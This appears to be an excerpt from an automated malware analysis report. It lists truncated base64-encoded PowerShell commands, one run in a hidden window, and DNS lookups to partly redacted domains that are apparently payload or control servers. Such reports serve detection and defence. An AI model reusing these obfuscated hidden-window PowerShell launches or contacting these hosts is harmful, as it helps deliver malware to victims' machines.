Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAQgBsAG0AYwB6AHoAaABhAGoAcwBoAGMAawAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBTAGoAdgBxAHIAZgB5AGsAIAAjAD4AIAAkAEkAZABnAGYAZQBtAGEAbQA9ACcATABzAGoAcABjA...
- DNS ASK ja#######ta.000webhostapp.com
- DNS ASK vi##.#ndonesia.nl
- DNS ASK de#####yle.ig.com.br
- DNS ASK ed######.embuguacu.sp.gov.br
- DNS ASK ps########nterne.inscription.psl.eu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAQgBsAG0AYwB6AHoAaABhAGoAcwBoAGMAawAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBTAGoAdgBxAHIAZgB5AGsAIAAjAD4AIAAkAEkAZABnAGYAZQBtAGEAbQA9ACcATABzAGoAcABjA...' (with hidden window)